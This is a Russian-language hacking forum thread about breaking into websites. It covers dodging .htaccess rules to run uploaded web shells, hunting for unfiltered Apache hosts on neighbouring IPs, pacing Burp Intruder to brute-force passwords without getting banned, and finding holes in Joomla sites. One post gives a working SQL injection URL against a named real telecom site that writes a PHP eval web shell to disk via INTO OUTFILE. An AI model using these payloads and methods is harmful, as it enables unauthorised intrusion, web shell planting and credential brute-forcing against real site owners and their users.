Все расширения пробовал? А то я встречал такие .хтаксес, что все виды .php - читались как текст, а вот .phtml прокатывал...
штака сохраняется как /htaccess, т.е без точки, т.е не работает (гружу через добавление темы) с расширениями тоже чего то не хочет. shtml шелл так же ничего не показывает
маловероятно но если правила для того что показывать/выполнять были настроены на nginx'е, то имеет смысл пробрутить соседние ip и посмотреть не висит ли там apache, если в апаче такие махинации с правилами не добавлялись, то шелл отработает прямым запрос на апач ---- вспомнил ещё, иногда поднят на сервере https, порой хост конфиг для nginx тоже другой
Может знает кто, можно в BurpSuite intruder сделать паузы, 10 запросов через 5 минут следующие 10 запросов? На случай если стоит бан, на ввод определенного колличества не правильных комбинаций.
Посоны, подскажите по поводу джумлы: есть несколько движков - просканил joomscan, ничего не нашел, запустил встроенный в msf сканер плагинов - несколько false-positive а на деле опять таки ничего. Джумла вообще как-нибудь сейчас хачится кроме подбора пароля администратора (последняя бага с rce не в счет) ?
Посоны, подскажите по поводу джумлы: есть несколько движков - просканил joomscan, ничего не нашел, запустил встроенный в msf сканер плагинов для жумлы - несколько false-positive а на деле опять таки ничего, cmsmap попробовал и получил в ответ кучу ошибок, как всегда. Джумла вообще как-нибудь сейчас хачится кроме подбора пароля администратора (последняя бага с rce не в счет) ?
Ну я вот сколько движков на скан пускал, там уявзимых плагинов не было. Такое впечатление что сейчас хостеры контролят эту тему. И вообще эти сканеры выдают что-нибудь годное? Только wpscan пока показал себя с лучшей стороны, все остальное либо работает через пень-колоду либо ничего не находит (привет joomscan).
Да, joomscan порой выдаёт что-то полезное. Там последнее обновление базы было хрен знаео когда. Забросили же.
Мне поэтому и интересно что прошаренные юзают. Вот в своей нише wpscan - отличная тулза, ее и поддерживают до сих пор. А вот у cmsmap задумка масштабная, но реализация НЕ ОЧЕНЬ. Вот и приходится пробовать комбинировать все, но имхо это не совсем то.
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,'<?php eval($_GET[cmd]); ?>',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+INTO+OUTFILE+'/var/www/html/platformaonline/template/new/scripturi/shell.php'+--+ Что я делаю нетак? Раскрытие http://my.moldtelecom.md/scripturi/ajax_login.php?username=
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
